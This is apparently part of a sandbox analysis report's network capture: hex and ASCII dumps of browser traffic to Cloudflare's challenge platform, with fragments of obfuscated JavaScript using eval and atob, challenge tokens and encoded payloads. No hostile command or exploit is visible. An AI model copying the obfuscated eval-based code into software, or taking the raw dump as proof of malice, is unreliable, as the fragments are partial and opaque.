                                      Data Ascii: ':function(h,i){return h<<i},'WvAyp':function(h,i){return h<i},'yjvYD':function(h,i){return h+i},'hwZKb':function(h,i){return h>i},'DeoIQ':hk(1076),'arueG':function(h,i){return h|i},'zwRfx':function(h,i){return i&h},'nLEbe':function(h,i){return h-i},'eXCG
                                      2024-09-13 13:15:57 UTC1369INData Raw: 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 68 70 29 7b 72 65 74 75 72 6e 20 68 70 3d 68 6e 2c 64 5b 68 70 28 39 32 34 29 5d 28 4f 2c 50 29 7d 2c 27 7a 4a 4e 71 66 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 2d 50 7d 2c 27 49 52 41 73 61 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 25 50 7d 7d 2c 6e 75 6c 6c 3d 3d 69 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 42 3d 7b 7d 2c 43 3d 7b 7d 2c 44 3d 27 27 2c 45 3d 32 2c 46 3d 33 2c 47 3d 32 2c 48 3d 5b 5d 2c 49 3d 30 2c 4a 3d 30 2c 4b 3d 30 3b 64 5b 68 6e 28 34 37 36 29 5d 28 4b 2c 69 5b 68 6e 28 31 31 33 38 29 5d 29 3b 4b 2b 3d 31 29 69 66 28 4c 3d 69 5b 68 6e 28 31 37 36 37 29 5d 28 4b 29 2c 4f 62 6a 65 63 74 5b 68 6e 28 37 38 38 29 5d 5b 68 6e 28 31 31
                                      Data Ascii: ':function(O,P,hp){return hp=hn,d[hp(924)](O,P)},'zJNqf':function(O,P){return O-P},'IRAsa':function(O,P){return O%P}},null==i)return'';for(B={},C={},D='',E=2,F=3,G=2,H=[],I=0,J=0,K=0;d[hn(476)](K,i[hn(1138)]);K+=1)if(L=i[hn(1767)](K),Object[hn(788)][hn(11
                                      2024-09-13 13:15:57 UTC1369INData Raw: 34 35 34 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4e 3d 31 2c 78 3d 30 3b 78 3c 47 3b 49 3d 64 5b 68 6e 28 31 35 34 33 29 5d 28 64 5b 68 6e 28 31 32 38 36 29 5d 28 49 2c 31 29 2c 4e 29 2c 4a 3d 3d 6a 2d 31 3f 28 4a 3d 30 2c 48 5b 68 6e 28 34 35 34 29 5d 28 64 5b 68 6e 28 31 30 39 38 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3d 30 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 68 6e 28 31 31 30 39 29 5d 28 30 29 2c 78 3d 30 3b 31 36 3e 78 3b 49 3d 49 3c 3c 31 7c 64 5b 68 6e 28 31 34 39 38 29 5d 28 4e 2c 31 29 2c 4a 3d 3d 64 5b 68 6e 28 31 33 37 31 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 68 6e 28 34 35 34 29 5d 28 64 5b 68 6e 28 31 30 39 38 29 5d 28 6f 2c 49 29 29 2c
                                      Data Ascii: 454)](o(I)),I=0):J++,N>>=1,x++);}else{for(N=1,x=0;x<G;I=d[hn(1543)](d[hn(1286)](I,1),N),J==j-1?(J=0,H[hn(454)](d[hn(1098)](o,I)),I=0):J++,N=0,x++);for(N=D[hn(1109)](0),x=0;16>x;I=I<<1|d[hn(1498)](N,1),J==d[hn(1371)](j,1)?(J=0,H[hn(454)](d[hn(1098)](o,I)),
                                      2024-09-13 13:15:57 UTC1369INData Raw: 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 73 77 69 74 63 68 28 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 73 28 31 37 36 33 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 64 5b 68 73 28 31 30 38 31 29 5d 28 46 2c 4b 29 3b 4e 3d 47 26 48 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4e 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4f 3d 64 5b 68 73 28 31 30 39 38 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 73 28 31 37 36 33 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4e 3d 48 26 47 2c 48 3e 3e 3d 31 2c 30 3d 3d 48 26 26 28 48 3d 6a 2c 47 3d 64 5b 68 73 28 35 30 36 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a
                                      Data Ascii: continue}break}switch(J){case 0:for(J=0,K=Math[hs(1763)](2,8),F=1;d[hs(1081)](F,K);N=G&H,H>>=1,H==0&&(H=j,G=o(I++)),J|=(0<N?1:0)*F,F<<=1);O=d[hs(1098)](e,J);break;case 1:for(J=0,K=Math[hs(1763)](2,16),F=1;K!=F;N=H&G,H>>=1,0==H&&(H=j,G=d[hs(506)](o,I++)),J
                                      2024-09-13 13:15:57 UTC1369INData Raw: 69 6e 67 5b 67 49 28 31 32 34 38 29 5d 28 66 61 29 2c 66 61 2b 2b 29 3b 66 62 3d 28 30 2c 65 76 61 6c 29 28 67 49 28 31 31 34 31 29 29 2c 66 63 3d 61 74 6f 62 28 67 49 28 39 31 33 29 29 2c 66 43 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 69 61 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 69 61 3d 67 49 2c 67 3d 7b 7d 2c 67 5b 69 61 28 37 34 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 2b 73 7d 2c 67 5b 69 61 28 31 38 34 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 2b 73 7d 2c 67 5b 69 61 28 31 39 35 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 25 73 7d 2c 67 5b 69 61 28 31 33 30 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e
                                      Data Ascii: ing[gI(1248)](fa),fa++);fb=(0,eval)(gI(1141)),fc=atob(gI(913)),fC=function(f,ia,g,h,i,j,k,l,m){for(ia=gI,g={},g[ia(746)]=function(n,s){return n+s},g[ia(1841)]=function(n,s){return n+s},g[ia(1959)]=function(n,s){return n%s},g[ia(1308)]=function(n,s){return
                                      2024-09-13 13:15:57 UTC1369INData Raw: 29 2c 6a 5b 69 65 28 31 31 37 35 29 5d 3d 69 65 28 31 32 30 35 29 2c 6a 5b 69 65 28 31 36 33 30 29 5d 3d 69 65 28 31 37 30 37 29 2c 6a 5b 69 65 28 31 30 36 38 29 5d 3d 69 65 28 36 39 33 29 2c 6a 29 3b 74 72 79 7b 69 66 28 6c 3d 6b 5b 69 65 28 31 30 32 38 29 5d 28 69 2c 6b 5b 69 65 28 34 31 36 29 5d 29 2c 6d 3d 65 4d 5b 69 65 28 34 32 31 29 5d 5b 69 65 28 36 37 31 29 5d 3f 6b 5b 69 65 28 31 37 30 33 29 5d 28 27 68 2f 27 2b 65 4d 5b 69 65 28 34 32 31 29 5d 5b 69 65 28 36 37 31 29 5d 2c 27 2f 27 29 3a 27 27 2c 6e 3d 6b 5b 69 65 28 34 37 30 29 5d 28 6b 5b 69 65 28 38 39 37 29 5d 28 69 65 28 31 35 38 38 29 2b 6d 2b 6b 5b 69 65 28 39 39 33 29 5d 2b 31 2c 6b 5b 69 65 28 31 31 37 35 29 5d 29 2c 65 4d 5b 69 65 28 34 32 31 29 5d 5b 69 65 28 31 39 36 35 29 5d 29 2b
                                      Data Ascii: ),j[ie(1175)]=ie(1205),j[ie(1630)]=ie(1707),j[ie(1068)]=ie(693),j);try{if(l=k[ie(1028)](i,k[ie(416)]),m=eM[ie(421)][ie(671)]?k[ie(1703)]('h/'+eM[ie(421)][ie(671)],'/'):'',n=k[ie(470)](k[ie(897)](ie(1588)+m+k[ie(993)]+1,k[ie(1175)]),eM[ie(421)][ie(1965)])+


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      13192.168.2.449755104.18.95.414434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:15:57 UTC438OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: */*
                                      Sec-Fetch-Site: none
                                      Sec-Fetch-Mode: cors
                                      Sec-Fetch-Dest: empty
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:15:57 UTC240INHTTP/1.1 200 OK
                                      Date: Fri, 13 Sep 2024 13:15:57 GMT
                                      Content-Type: image/png
                                      Content-Length: 61
                                      Connection: close
                                      cache-control: max-age=2629800, public
                                      Server: cloudflare
                                      CF-RAY: 8c2868b30bb032ee-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-13 13:15:57 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                      Data Ascii: PNGIHDRsIDAT$IENDB`


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      14192.168.2.449756104.18.95.414434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:15:57 UTC926OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1687353129:1726229860:oEB8zH5MRkhXjxacAPu7VKa8059iC9rH2eRs5vHP1jU/8c2868a8da4d78e7/245501c248c6a2e HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      Content-Length: 3112
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      Content-type: application/x-www-form-urlencoded
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      CF-Challenge: 245501c248c6a2e
                                      sec-ch-ua-platform: "Windows"
                                      Accept: */*
                                      Origin: https://challenges.cloudflare.com
                                      Sec-Fetch-Site: same-origin
                                      Sec-Fetch-Mode: cors
                                      Sec-Fetch-Dest: empty
                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9uusr/0x4AAAAAAAhY1lQpAZrIBISJ/auto/fbE/normal/auto/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:15:57 UTC3112OUTData Raw: 76 5f 38 63 32 38 36 38 61 38 64 61 34 64 37 38 65 37 3d 35 31 6b 67 55 67 6d 67 75 55 50 37 6b 6f 31 6d 5a 77 50 62 50 69 50 65 54 50 56 67 49 44 4d 48 37 6d 50 58 39 46 77 50 35 6d 42 61 42 5a 33 38 50 52 6c 78 5a 78 50 5a 24 77 67 38 4d 5a 61 42 4e 50 5a 79 6b 50 69 50 36 58 6c 6d 50 56 6d 6f 72 55 6f 50 56 64 33 6f 35 54 6d 56 66 50 79 6d 6f 24 50 6f 49 61 72 6d 53 50 32 6b 50 33 50 68 47 2d 38 64 78 6d 56 4e 58 69 24 4d 74 39 42 62 50 42 4d 50 54 77 4e 38 77 50 71 35 4e 39 69 62 4d 37 75 42 6b 24 6e 68 79 6f 6e 6c 44 66 43 49 50 6b 6b 74 69 4e 7a 6c 50 56 6b 50 4e 4a 49 4e 41 67 43 67 50 38 31 50 30 67 36 67 73 30 2d 6b 36 67 56 73 50 5a 2d 32 69 67 42 51 7a 6d 6f 58 50 68 4a 50 46 71 56 72 4f 61 2d 51 4c 4e 6b 50 37 45 45 57 69 37 44 70 76 6b 59 24
                                      Data Ascii: v_8c2868a8da4d78e7=51kgUgmguUP7ko1mZwPbPiPeTPVgIDMH7mPX9FwP5mBaBZ38PRlxZxPZ$wg8MZaBNPZykPiP6XlmPVmorUoPVd3o5TmVfPymo$PoIarmSP2kP3PhG-8dxmVNXi$Mt9BbPBMPTwN8wPq5N9ibM7uBk$nhyonlDfCIPkktiNzlPVkPNJINAgCgP81P0g6gs0-k6gVsPZ-2igBQzmoXPhJPFqVrOa-QLNkP7EEWi7DpvkY$
                                      2024-09-13 13:15:57 UTC747INHTTP/1.1 200 OK
                                      Date: Fri, 13 Sep 2024 13:15:57 GMT
                                      Content-Type: text/plain; charset=UTF-8
                                      Content-Length: 153436
                                      Connection: close
                                      cf-chl-gen: TwCTYUZmsHyHJyeGBYhwxxIUqJz3e22e8wU5WlchCzt/x7idfWSrUlbAKMpB4uaA1PTch4mOKEm0X4zKUSNe63qTf5rlvI0I3vvnAnElHG7tKv0JtWI3AutLVt8HIwbh64XRJvARiC+m20G1yQzBZxGG5p/DssPHvYmspXb4XCUALEy50IbLD8tcQy6JVjA5DMqICgwa9oq8MHJlAAdMpJARE6PDTrIfVzcQ4kOcS1ufGyuvCJ0s0Bng5h0pibpxEgWu/nSF61v/1GanMVh4X5CdPJ7vqtn2+jHq5zgQXGyrxeCM9uP4CyLUmg8ttnjXwbJ3vVSCd7W7B01uJa45rM2mpKn9EewJh0FhngEGEoWWdL1dFHK/9rVNCSe1CmaC40G7cFyH5NreUJaG/V079Qq7SbssleE3wyHZXvr4sPSEWts/HDECfBJU+rDR00gRgluA7bWUJl/DWe7FKmHOOCUNToBNjTTwvnY097HIqVAxJ3g=$uEbsdlDy30QF5J2Z
                                      Server: cloudflare
                                      CF-RAY: 8c2868b39dfc8c8d-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-13 13:15:57 UTC622INData Raw: 68 36 52 32 6d 62 57 54 6c 34 2f 41 6c 62 36 65 75 35 61 6a 6c 37 75 73 75 4a 57 35 69 35 75 36 70 71 7a 4a 6a 4b 2f 48 73 4b 75 6c 74 4d 61 78 72 37 4b 73 79 71 4b 76 77 39 75 33 35 4f 4b 35 79 75 53 34 31 61 36 37 79 2b 32 2b 34 39 37 49 38 4e 48 58 73 4e 50 34 39 73 76 4a 2f 4d 7a 57 34 2b 7a 51 39 38 62 53 2b 76 72 61 34 77 73 44 32 64 6e 36 2b 65 49 54 2f 42 58 6e 7a 66 44 58 30 4f 54 6b 2b 74 54 6f 36 50 54 74 32 53 50 35 39 69 67 56 4b 66 73 70 42 76 76 32 48 78 73 46 2b 7a 49 47 4a 44 45 53 45 50 41 55 4f 77 55 53 43 68 6f 4a 46 67 35 44 4c 6a 6f 46 2b 53 51 39 46 41 74 47 53 51 70 43 53 69 63 65 43 6b 59 57 4e 46 67 54 4d 46 59 72 56 6a 70 67 48 32 49 37 47 6c 34 62 4e 57 63 6e 59 6c 67 71 52 6a 39 41 4f 6b 51 6e 4c 53 6c 53 51 44 39 68 4d 45 70
                                      Data Ascii: h6R2mbWTl4/Alb6eu5ajl7usuJW5i5u6pqzJjK/HsKultMaxr7KsyqKvw9u35OK5yuS41a67y+2+497I8NHXsNP49svJ/MzW4+zQ98bS+vra4wsD2dn6+eIT/BXnzfDX0OTk+tTo6PTt2SP59igVKfspBvv2HxsF+zIGJDESEPAUOwUSChoJFg5DLjoF+SQ9FAtGSQpCSiceCkYWNFgTMFYrVjpgH2I7Gl4bNWcnYlgqRj9AOkQnLSlSQD9hMEp
                                      2024-09-13 13:15:57 UTC1369INData Raw: 78 59 66 55 65 44 68 58 2b 52 56 6f 35 31 61 6d 4f 61 6d 56 6c 38 64 5a 4e 65 65 31 75 55 68 6e 69 43 6b 32 5a 36 59 6f 65 59 6c 6e 78 35 5a 35 31 79 6f 61 4b 6c 75 4b 61 59 6a 34 32 36 6b 61 6d 4c 66 63 43 67 77 62 53 56 6b 34 4b 6c 6b 73 61 4c 75 62 61 4d 6d 5a 32 67 69 70 4b 68 7a 73 7a 41 70 4c 6d 4d 75 38 33 59 6d 71 75 64 76 4b 36 36 76 74 69 2f 33 4f 4f 78 75 36 62 46 34 72 72 46 72 73 33 76 30 4c 50 4e 35 63 2f 53 74 73 72 36 74 63 34 41 36 73 72 33 39 2f 54 59 41 63 44 78 38 74 77 47 33 77 6d 2f 33 4f 67 51 35 4f 54 50 46 4d 33 6d 41 75 6f 4f 37 42 48 34 44 67 67 4b 47 4f 37 64 48 75 51 65 35 50 73 62 42 75 63 41 34 2f 58 70 42 41 33 73 37 51 67 52 4c 50 45 4d 46 42 72 31 45 42 67 4f 2b 52 51 63 2f 50 30 59 49 44 77 43 48 43 4d 71 42 69 41 6e 44
                                      Data Ascii: xYfUeDhX+RVo51amOamVl8dZNee1uUhniCk2Z6YoeYlnx5Z51yoaKluKaYj426kamLfcCgwbSVk4KlksaLubaMmZ2gipKhzszApLmMu83YmqudvK66vti/3OOxu6bF4rrFrs3v0LPN5c/Stsr6tc4A6sr39/TYAcDx8twG3wm/3OgQ5OTPFM3mAuoO7BH4DggKGO7dHuQe5PsbBucA4/XpBA3s7QgRLPEMFBr1EBgO+RQc/P0YIDwCHCMqBiAnD
                                      2024-09-13 13:15:57 UTC1369INData Raw: 57 6c 46 4b 4a 63 31 52 76 6c 32 31 38 57 56 65 62 65 47 47 62 59 48 65 6d 64 6e 61 64 70 57 4a 33 65 34 64 38 6e 6f 36 4c 67 34 43 46 71 61 43 61 69 5a 4b 6b 6e 61 61 4e 71 4b 47 63 6a 62 4a 2b 74 63 53 33 71 5a 76 49 74 37 58 4a 68 37 69 76 77 70 32 39 6a 73 61 69 77 35 53 72 32 4d 53 37 7a 4d 2f 64 71 63 36 77 76 5a 2b 34 6e 63 58 53 36 71 61 69 35 4f 58 58 37 72 33 4c 77 75 33 45 34 36 33 6c 78 50 4c 4d 37 2b 61 34 36 66 4f 38 30 41 4c 37 77 4f 44 6e 38 51 58 5a 44 4d 50 58 37 4f 58 78 43 4d 54 53 45 64 2f 7a 31 52 59 50 44 68 76 39 37 66 67 61 31 77 50 59 38 42 2f 6b 2b 52 67 69 35 69 63 74 4a 52 67 47 2b 51 77 47 42 4f 73 67 4a 2f 45 4f 49 51 62 32 4f 53 59 56 4d 77 34 71 48 78 55 65 4f 44 6f 30 4f 78 6f 66 54 43 59 6a 54 52 30 73 52 52 73 4b 4b 42
                                      Data Ascii: WlFKJc1Rvl218WVebeGGbYHemdnadpWJ3e4d8no6Lg4CFqaCaiZKknaaNqKGcjbJ+tcS3qZvIt7XJh7ivwp29jsaiw5Sr2MS7zM/dqc6wvZ+4ncXS6qai5OXX7r3Lwu3E463lxPLM7+a46fO80AL7wODn8QXZDMPX7OXxCMTSEd/z1RYPDhv97fga1wPY8B/k+Rgi5ictJRgG+QwGBOsgJ/EOIQb2OSYVMw4qHxUeODo0OxofTCYjTR0sRRsKKB
                                      2024-09-13 13:15:57 UTC1369INData Raw: 6e 55 2b 48 64 61 47 43 6c 6e 36 61 64 4a 39 6d 66 48 65 44 6f 6d 70 6d 71 4b 65 76 63 49 53 52 6f 59 71 72 67 4b 42 34 6b 5a 64 30 6b 72 4f 62 74 37 79 33 74 58 36 62 6e 62 70 2f 76 38 71 2f 6c 5a 2f 50 71 4d 61 37 30 38 62 55 76 38 62 4d 6d 4e 62 4c 78 70 72 48 32 70 62 4d 7a 61 33 59 6e 38 2f 66 76 4b 43 39 34 38 69 6c 33 39 71 6f 75 4d 48 54 77 64 37 57 39 61 2b 34 78 4f 33 50 2b 4e 69 77 76 72 4c 78 37 50 50 59 38 4e 45 47 76 2f 51 4c 39 66 72 32 33 50 6b 46 38 73 54 7a 37 65 45 43 38 4f 6b 58 42 42 58 63 47 75 34 65 45 50 6b 43 38 74 72 32 49 51 55 65 2b 67 55 43 35 52 6e 36 2b 2b 77 41 4d 77 33 75 38 42 51 35 4a 7a 49 4d 4f 53 58 33 46 44 63 76 2f 42 4d 59 48 55 4d 6d 52 76 6f 46 49 6b 49 6f 51 67 39 4b 41 7a 45 53 48 6b 64 4e 4f 45 30 56 4e 44 5a
                                      Data Ascii: nU+HdaGCln6adJ9mfHeDompmqKevcISRoYqrgKB4kZd0krObt7y3tX6bnbp/v8q/lZ/PqMa708bUv8bMmNbLxprH2pbMza3Yn8/fvKC948il39qouMHTwd7W9a+4xO3P+NiwvrLx7PPY8NEGv/QL9fr23PkF8sTz7eEC8OkXBBXcGu4eEPkC8tr2IQUe+gUC5Rn6++wAMw3u8BQ5JzIMOSX3FDcv/BMYHUMmRvoFIkIoQg9KAzESHkdNOE0VNDZ
                                      2024-09-13 13:15:57 UTC1369INData Raw: 70 78 69 66 4b 46 64 57 6e 61 58 71 36 43 59 70 47 31 72 69 71 71 4d 6b 62 52 74 70 37 56 76 74 5a 69 4a 71 4b 6d 4d 69 62 75 74 6b 49 32 45 73 5a 53 51 6e 62 57 59 6c 4d 4f 64 70 71 2b 69 7a 62 43 6a 70 36 53 74 70 70 47 33 31 73 32 36 71 62 2f 4b 32 5a 6e 63 72 35 7a 6e 74 39 48 6a 78 37 6e 47 74 38 7a 61 79 4c 37 43 72 4f 53 78 77 74 48 46 37 74 54 54 73 2b 65 2b 33 50 33 56 36 37 2f 38 39 63 44 33 76 73 63 47 36 4e 6e 4e 2b 64 7a 59 35 66 33 67 33 41 7a 6c 37 76 66 71 46 76 6a 72 37 2b 7a 31 37 74 6b 41 48 2f 50 39 4a 2f 48 6b 48 53 77 56 35 75 51 44 43 53 4d 44 45 78 38 46 4d 78 41 46 42 43 6b 6c 46 50 6b 79 46 68 66 79 47 66 6f 35 47 44 49 5a 2f 6a 68 43 50 30 5a 48 49 6a 77 76 52 56 41 4a 44 77 73 30 49 51 70 46 46 43 68 4f 48 52 52 66 50 78 67 55
                                      Data Ascii: pxifKFdWnaXq6CYpG1riqqMkbRtp7VvtZiJqKmMibutkI2EsZSQnbWYlMOdpq+izbCjp6StppG31s26qb/K2Zncr5znt9Hjx7nGt8zayL7CrOSxwtHF7tTTs+e+3P3V67/89cD3vscG6NnN+dzY5f3g3Azl7vfqFvjr7+z17tkAH/P9J/HkHSwV5uQDCSMDEx8FMxAFBCklFPkyFhfyGfo5GDIZ/jhCP0ZHIjwvRVAJDws0IQpFFChOHRRfPxgU
                                      2024-09-13 13:15:57 UTC1369INData Raw: 2b 67 64 6c 36 72 68 57 70 76 72 59 75 71 70 71 47 58 74 4b 42 7a 68 71 75 35 68 61 71 4d 6d 58 75 53 72 4a 47 6d 6c 4b 65 58 6f 63 6d 70 69 4d 44 50 75 49 72 50 30 61 47 55 77 5a 62 50 72 4b 71 77 75 4b 75 32 73 64 4c 53 33 61 33 4d 33 63 4f 2b 75 4b 44 52 74 4e 53 32 31 72 66 41 71 4b 36 38 33 4d 2f 6d 72 63 58 74 77 73 62 6f 37 38 57 38 2f 74 58 61 37 4e 33 51 41 39 72 31 31 41 6a 34 2b 38 6e 37 7a 51 50 67 41 65 62 6a 34 42 62 77 7a 76 4c 30 35 75 54 32 45 42 4c 2b 2f 42 66 39 2b 42 66 63 39 39 37 36 36 42 58 34 4a 79 63 62 36 41 38 78 41 51 30 70 2f 75 30 49 2b 41 55 44 46 67 6f 39 4c 50 67 53 47 79 4d 5a 46 76 63 47 47 68 6b 55 4e 53 6f 59 4a 79 38 2f 53 79 70 55 43 79 34 76 4e 30 63 70 4d 6c 6c 4c 56 7a 5a 53 50 6c 41 67 50 6c 78 55 51 6b 42 70 55
                                      Data Ascii: +gdl6rhWpvrYuqpqGXtKBzhqu5haqMmXuSrJGmlKeXocmpiMDPuIrP0aGUwZbPrKqwuKu2sdLS3a3M3cO+uKDRtNS21rfAqK683M/mrcXtwsbo78W8/tXa7N3QA9r11Aj4+8n7zQPgAebj4BbwzvL05uT2EBL+/Bf9+Bfc99766BX4Jycb6A8xAQ0p/u0I+AUDFgo9LPgSGyMZFvcGGhkUNSoYJy8/SypUCy4vN0cpMllLVzZSPlAgPlxUQkBpU
                                      2024-09-13 13:15:57 UTC1369INData Raw: 6b 6e 4b 75 75 74 61 36 50 63 72 61 79 6d 59 53 34 71 61 71 38 75 4b 6d 34 6d 6f 54 43 6d 37 57 62 74 5a 32 42 79 49 57 71 6f 6f 69 49 72 70 2f 54 6a 4c 4b 6b 31 35 43 32 71 64 75 55 75 71 37 66 6d 4c 36 72 34 35 7a 43 73 64 62 54 71 74 58 67 70 63 72 5a 35 74 47 74 33 4e 48 54 73 4f 33 35 31 39 6e 34 31 39 48 31 2b 77 44 64 7a 76 6a 50 31 62 67 45 34 66 50 32 41 64 66 64 78 66 66 6f 35 4d 73 4c 35 2b 51 55 7a 51 55 46 43 4e 55 52 43 52 62 52 30 67 50 74 41 4f 33 33 4b 41 45 66 36 66 55 57 4b 75 30 43 41 68 2f 2b 44 67 51 55 4e 6a 49 6a 39 7a 73 36 42 67 73 7a 39 6a 73 56 41 6a 38 4d 2b 30 4d 48 2f 55 59 63 53 53 63 6a 54 67 6b 68 4b 30 78 54 48 6a 39 56 52 6b 49 50 57 30 67 39 55 53 67 5a 4d 46 77 79 55 44 30 63 4f 47 51 36 61 46 59 39 59 45 46 4b 4b 56
                                      Data Ascii: knKuuta6PcraymYS4qaq8uKm4moTCm7WbtZ2ByIWqooiIrp/TjLKk15C2qduUuq7fmL6r45zCsdbTqtXgpcrZ5tGt3NHTsO3519n419H1+wDdzvjP1bgE4fP2Adfdxffo5MsL5+QUzQUFCNURCRbR0gPtAO33KAEf6fUWKu0CAh/+DgQUNjIj9zs6Bgsz9jsVAj8M+0MH/UYcSScjTgkhK0xTHj9VRkIPW0g9USgZMFwyUD0cOGQ6aFY9YEFKKV
                                      2024-09-13 13:15:57 UTC1369INData Raw: 74 6f 43 58 69 35 47 58 64 70 71 4f 64 70 69 7a 72 5a 70 33 6d 71 43 39 67 62 4b 36 71 36 75 69 69 63 69 52 77 72 4f 4d 69 34 36 58 30 74 4f 71 74 38 6d 37 6d 61 6d 5a 6d 70 53 69 33 61 44 6c 32 4d 62 6a 73 71 71 2b 79 4b 33 74 71 64 4c 41 70 65 44 30 76 39 4c 71 74 64 62 5a 79 66 6e 63 34 4c 76 57 79 39 6a 4d 32 72 37 30 39 64 6a 57 2b 38 7a 5a 36 75 6e 50 36 63 7a 52 39 65 6e 4d 30 73 37 33 34 68 66 58 47 78 66 6e 44 50 41 42 47 42 38 6a 4a 50 51 45 2f 42 67 62 48 2b 73 6f 2b 69 30 47 41 54 51 79 4c 53 54 32 44 41 38 6a 4f 50 76 36 39 6a 49 77 38 77 4d 36 46 7a 34 37 41 44 34 30 4a 43 73 65 4a 79 6f 6a 42 79 4d 72 4a 31 46 4d 4b 68 64 59 45 54 6b 71 4c 6b 35 4d 49 45 39 68 4d 55 4a 59 58 43 56 46 51 46 68 55 58 6c 5a 45 4c 32 59 2b 50 6d 78 50 62 54 59
                                      Data Ascii: toCXi5GXdpqOdpizrZp3mqC9gbK6q6uiiciRwrOMi46X0tOqt8m7mamZmpSi3aDl2Mbjsqq+yK3tqdLApeD0v9LqtdbZyfnc4LvWy9jM2r709djW+8zZ6unP6czR9enM0s734hfXGxfnDPABGB8jJPQE/BgbH+so+i0GATQyLST2DA8jOPv69jIw8wM6Fz47AD40JCseJyojByMrJ1FMKhdYETkqLk5MIE9hMUJYXCVFQFhUXlZEL2Y+PmxPbTY
                                      2024-09-13 13:15:57 UTC1369INData Raw: 5a 4b 59 73 33 32 69 72 70 53 2b 65 4a 62 43 74 63 4b 55 70 58 2b 49 76 34 61 50 7a 62 43 67 71 73 47 6b 6f 4d 2b 70 73 72 75 75 32 62 79 76 73 37 43 35 73 70 33 44 34 73 6a 6a 6f 74 36 71 70 4f 2f 42 32 65 76 50 76 4d 36 2f 77 4f 4c 78 79 50 62 71 2f 66 50 62 75 2b 7a 51 33 77 54 76 31 4e 7a 55 38 76 37 39 77 74 33 5a 39 73 38 53 35 4d 72 54 44 77 38 53 39 4f 54 75 42 75 6a 6b 46 4f 33 32 41 50 49 65 41 66 50 33 39 50 33 32 34 51 67 6e 4b 43 55 4c 47 77 59 77 4d 77 59 75 4b 42 59 42 4d 44 67 37 45 7a 59 77 48 67 39 42 44 42 55 76 2f 55 55 56 49 44 74 4a 41 6a 77 4e 47 69 38 6b 41 31 49 6a 48 69 55 50 4c 43 49 59 46 6a 49 37 53 6c 39 64 47 31 49 38 48 54 52 67 4e 57 52 5a 49 57 59 36 53 57 35 45 50 6b 59 6f 62 43 31 4d 4c 57 78 49 4d 55 64 48 4d 33 59 7a
